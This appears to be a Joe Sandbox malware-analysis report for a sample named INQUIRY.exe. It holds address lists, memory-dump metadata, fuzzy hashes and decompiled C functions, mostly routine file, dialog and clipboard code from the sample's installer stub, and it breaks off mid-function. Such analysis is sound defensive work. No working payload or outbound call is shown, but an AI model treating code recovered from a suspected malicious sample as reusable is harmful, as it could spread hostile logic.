0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x004066b8
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00000000
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x0040673a
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004066bb
0x004066b8

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 021A1597 Relevance: 4.9, APIs: 3, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b35b8b63c01ba1d8d8bba8d7a1ba96051c35d81bab3d879158d6d6d9c912ee1b
Instruction ID: 43782a2b25cc585e36ea4d2cf317b7eccd294be07ad7f424c2f870b9af91db2b
Opcode Fuzzy Hash: b35b8b63c01ba1d8d8bba8d7a1ba96051c35d81bab3d879158d6d6d9c912ee1b
Instruction Fuzzy Hash: 84F1F129E90358ADEB60CBE4EC65BFEB3B5AF48710F105497E60DEA190E7704A80DF15

Uniqueness

Uniqueness Score: -1.00%

Function 021A1AD7 Relevance: 3.1, APIs: 2, Instructions: 74COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(021A1A21,?,?,?,?,?,?,?,?,021A1A21,?), ref: 021A1B71
CreateDirectoryW.KERNELBASE(021A1A21,00000000,?,?,?,?,?,?,?,?,021A1A21,?), ref: 021A1B85

Memory Dump Source

Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd

Similarity

API ID: CreateDirectoryExistsFilePath
String ID:
API String ID: 2624722123-0
Opcode ID: d6302ff009401f4bd2299211d049a1337e1d04fc8b5aafa2dab8ea7001d5b6bc
Instruction ID: 86ad82a6b43e2f3b5d4623ab2605f52b1da04807b7e712c7c56e05246cdbd845
Opcode Fuzzy Hash: d6302ff009401f4bd2299211d049a1337e1d04fc8b5aafa2dab8ea7001d5b6bc
Instruction Fuzzy Hash: B521A429E90348AEDB50DBF4E821BBEB7B6AF48750F205416E509EA2A0F7714E40DB45

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423ed0; // 0x51dddc
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x00401392
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040575C Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040575C(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405760
0x0040576d
0x00405782
0x00405788

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\INQUIRY.exe,80000000,00000003), ref: 00405760
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0040573D Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040573D(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}

0x00405741
0x0040574a
0x00000000
0x00405753
0x00405759

APIs

GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A

Uniqueness

Uniqueness Score: -1.00%

Function 004031A8 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031A8(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x004031ac
0x004031bf
0x004031c7
0x00000000
0x004031ce
0x00000000
0x004031d0

APIs

ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004031DA Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031DA(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}

0x004031e8
0x004031ee

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,0000B5E4), ref: 004031E8

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404F61 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t112;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420498;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42366c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423ea8, 8);
							__eflags =  *0x423f2c - _t149; // 0x0
							if(__eflags == 0) {
								_t112 =  *0x41fc68; // 0x0
								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
							}
							E00403E10(1);
							goto L25;
						}
						 *0x41f860 = 2;
						E00403E10(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403E9E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403E6C(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0; // 0x51d818
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403E6C( *0x423670);
				 *0x423674 = E004046C5(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E37(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E6C( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
